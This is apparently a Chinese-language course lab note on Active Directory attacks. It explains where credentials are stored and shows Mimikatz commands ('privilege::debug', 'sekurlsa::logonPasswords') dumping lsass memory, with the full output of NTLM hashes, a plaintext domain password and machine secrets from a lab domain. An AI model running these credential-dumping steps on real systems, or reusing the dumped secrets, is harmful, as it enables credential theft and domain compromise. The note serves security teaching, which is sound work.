NTUSTISC - AD Note - Lab(透過Mimikatz取得Local Admin的NTLM)
[TOC]
Lecture Video: 2022/05/04 AD 安全1
Background
得到更高權限之後,會想要更多的密碼
- 密碼收集
- SAM.hive(Security Account Manager)
- Password Spraying(用猜的)
- GPO
- Where:
\\<domain>\SysVol\<domain>\Policie,以本次實驗為例,就是放在\\kuma.org\SYSVOL\kuma.org\Policies,接下來就是隨機生成的<UID>\Users\Scripts和<UID>\Machine\Scripts,這兩個腳本是我們覺得重要的
- Where:
- 記憶體(lsass)
- 為了獲取更多其他帳號密碼,嘗試逼近Domain Admin,可以使用Mimikatz獲取暫存憑證
- ==What is Mimikatz?==
Mimikatz為一個強力的Windows提權工具,可以提升Process權限、注入Process讀取Process記憶體,可以直接從lsass中獲取當前登錄過系統用戶的帳號明文密碼。 lsass是微軟Windows系統的安全機制它主要用於本地安全和登陸策略,通常我們在登陸系統時輸入密碼之後,密碼便會儲存在lsass內存中,經過其wdigest和tspkg兩個模塊調用後,對其使用可逆的算法進行加密並存儲在內存之中,而mimikatz正是通過對lsass的逆算獲取到明文密碼。 簡單說就是所有登入認證都交給lsass,所以他有所有人的認證憑證
- Download: Mimikatz-github
- How to use: Mimikatz最新版本一共三個文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分為Win32位(多了一個mimilove.exe文件)和X64位 下載後解壓縮即可使用,裡面分為Win32和X64,Win32是針對Windows32位,而X64是針對64位作業系統,目前絕大部分作業系統為64位
- ==lsass.exe VS SAM== SAM只會存取本地用戶的NTLM Hash,而lsass.exe是只要有存取過目前電腦的使用者都會被記錄,例如domain admin或是其他使用者利用smb連過來也會被lsass紀錄
Lab
==透過Mimikatz取得Local Admin的NTLM==
- Activate Mimikatz
進入
C:\tools\mimikatz_trunk\x64右鍵以系統管理員身分執行mimikatz.exe(一定要用系統管理員才能執行提權的debug) - 起手式
1
2
3
4
5
6
7mimikatz # Privilege::Debug Privilege '20' OK mimikatz # log Using 'mimikatz.log' for logfile : OK mimikatz # Sekurlsa::logonPasswords:::spoiler Log Reuslt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348Using 'mimikatz.log' for logfile : OK mimikatz # Sekurlsa::logonPasswords Authentication Id : 0 ; 23133312 (00000000:0160fc80) Session : CachedInteractive from 1 User Name : Administrator Domain : kuma Logon Server : WIN-818G5VCOLJO Logon Time : 2023/9/4 06:07:18 SID : S-1-5-21-306106713-2531972042-334329499-500 msv : [00000003] Primary * Username : Administrator * Domain : kuma * NTLM : 7ecffff0c3548187607a14bad0f88bb1 * SHA1 : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0 * DPAPI : cf967ea9c9c0f9d58b79fdd040270648 tspkg : wdigest : * Username : Administrator * Domain : kuma * Password : (null) kerberos : * Username : Administrator * Domain : KUMA.ORG * Password : 1qaz@WSX3edc ssp : credman : cloudap : Authentication Id : 0 ; 20047794 (00000000:0131e7b2) Session : CachedInteractive from 1 User Name : Administrator Domain : kuma Logon Server : WIN-818G5VCOLJO Logon Time : 2023/9/4 10:19:22 SID : S-1-5-21-306106713-2531972042-334329499-500 msv : [00000003] Primary * Username : Administrator * Domain : kuma * NTLM : 7ecffff0c3548187607a14bad0f88bb1 * SHA1 : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0 * DPAPI : cf967ea9c9c0f9d58b79fdd040270648 tspkg : wdigest : * Username : Administrator * Domain : kuma * Password : (null) kerberos : * Username : Administrator * Domain : KUMA.ORG * Password : (null) ssp : credman : cloudap : Authentication Id : 0 ; 16441076 (00000000:00fadef4) Session : Interactive from 1 User Name : administrator Domain : kuma Logon Server : WIN-818G5VCOLJO Logon Time : 2023/9/4 12:44:48 SID : S-1-5-21-306106713-2531972042-334329499-500 msv : [00000003] Primary * Username : Administrator * Domain : kuma * NTLM : 7ecffff0c3548187607a14bad0f88bb1 * SHA1 : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0 * DPAPI : cf967ea9c9c0f9d58b79fdd040270648 tspkg : wdigest : * Username : Administrator * Domain : kuma * Password : (null) kerberos : * Username : administrator * Domain : KUMA.ORG * Password : (null) ssp : credman : cloudap : Authentication Id : 0 ; 14849757 (00000000:00e296dd) Session : Service from 0 User Name : DefaultAppPool Domain : IIS APPPOOL Logon Server : (null) Logon Time : 2023/9/3 09:44:12 SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 msv : [00000003] Primary * Username : DESKTOP-G95U93T$ * Domain : kuma * NTLM : 5648c9d78a770f3e0f727a5fac99da5a * SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221 tspkg : wdigest : * Username : DESKTOP-G95U93T$ * Domain : kuma * Password : (null) kerberos : * Username : DESKTOP-G95U93T$ * Domain : kuma.org * Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF ssp : credman : cloudap : Authentication Id : 0 ; 1299130 (00000000:0013d2ba) Session : Interactive from 1 User Name : bear Domain : kuma Logon Server : WIN-818G5VCOLJO Logon Time : 2023/8/29 12:47:58 SID : S-1-5-21-306106713-2531972042-334329499-2101 msv : [00000003] Primary * Username : bear * Domain : kuma * NTLM : 7ecffff0c3548187607a14bad0f88bb1 * SHA1 : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0 * DPAPI : 4057a0d0b94378dd03224e8b3d28a006 tspkg : wdigest : * Username : bear * Domain : kuma * Password : (null) kerberos : * Username : bear * Domain : KUMA.ORG * Password : (null) ssp : credman : cloudap : Authentication Id : 0 ; 995 (00000000:000003e3) Session : Service from 0 User Name : IUSR Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2023/8/29 12:40:42 SID : S-1-5-17 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : ssp : credman : cloudap : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2023/8/29 12:40:39 SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : cloudap : Authentication Id : 0 ; 70138 (00000000:000111fa) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 2023/8/29 12:40:38 SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : DESKTOP-G95U93T$ * Domain : kuma * NTLM : 5648c9d78a770f3e0f727a5fac99da5a * SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221 tspkg : wdigest : * Username : DESKTOP-G95U93T$ * Domain : kuma * Password : (null) kerberos : * Username : DESKTOP-G95U93T$ * Domain : kuma.org * Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF ssp : credman : cloudap : Authentication Id : 0 ; 70109 (00000000:000111dd) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 2023/8/29 12:40:38 SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : DESKTOP-G95U93T$ * Domain : kuma * NTLM : 5648c9d78a770f3e0f727a5fac99da5a * SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221 tspkg : wdigest : * Username : DESKTOP-G95U93T$ * Domain : kuma * Password : (null) kerberos : * Username : DESKTOP-G95U93T$ * Domain : kuma.org * Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF ssp : credman : cloudap : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : DESKTOP-G95U93T$ Domain : kuma Logon Server : (null) Logon Time : 2023/8/29 12:40:38 SID : S-1-5-20 msv : [00000003] Primary * Username : DESKTOP-G95U93T$ * Domain : kuma * NTLM : 5648c9d78a770f3e0f727a5fac99da5a * SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221 tspkg : wdigest : * Username : DESKTOP-G95U93T$ * Domain : kuma * Password : (null) kerberos : * Username : desktop-g95u93t$ * Domain : KUMA.ORG * Password : (null) ssp : credman : cloudap : Authentication Id : 0 ; 47346 (00000000:0000b8f2) Session : Interactive from 1 User Name : UMFD-1 Domain : Font Driver Host Logon Server : (null) Logon Time : 2023/8/29 12:40:38 SID : S-1-5-96-0-1 msv : [00000003] Primary * Username : DESKTOP-G95U93T$ * Domain : kuma * NTLM : 5648c9d78a770f3e0f727a5fac99da5a * SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221 tspkg : wdigest : * Username : DESKTOP-G95U93T$ * Domain : kuma * Password : (null) kerberos : * Username : DESKTOP-G95U93T$ * Domain : kuma.org * Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF ssp : credman : cloudap : Authentication Id : 0 ; 46297 (00000000:0000b4d9) Session : Interactive from 0 User Name : UMFD-0 Domain : Font Driver Host Logon Server : (null) Logon Time : 2023/8/29 12:40:38 SID : S-1-5-96-0-0 msv : [00000003] Primary * Username : DESKTOP-G95U93T$ * Domain : kuma * NTLM : 5648c9d78a770f3e0f727a5fac99da5a * SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221 tspkg : wdigest : * Username : DESKTOP-G95U93T$ * Domain : kuma * Password : (null) kerberos : * Username : DESKTOP-G95U93T$ * Domain : kuma.org * Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF ssp : credman : cloudap : Authentication Id : 0 ; 44132 (00000000:0000ac64) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 2023/8/29 12:40:37 SID : msv : [00000003] Primary * Username : DESKTOP-G95U93T$ * Domain : kuma * NTLM : 5648c9d78a770f3e0f727a5fac99da5a * SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221 tspkg : wdigest : kerberos : ssp : credman : cloudap : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : DESKTOP-G95U93T$ Domain : kuma Logon Server : (null) Logon Time : 2023/8/29 12:40:37 SID : S-1-5-18 msv : tspkg : wdigest : * Username : DESKTOP-G95U93T$ * Domain : kuma * Password : (null) kerberos : * Username : desktop-g95u93t$ * Domain : KUMA.ORG * Password : (null) ssp : credman : cloudap :::: 可以看到這一份檔案比前面提到的SAM還要完整很多,用log的原因是他會把輸出dump下來,用熟悉的文字編輯器尋找有用的資訊比較方便,另外,==Privilege::Debug==的意思是跟windows取得debug lsass的權限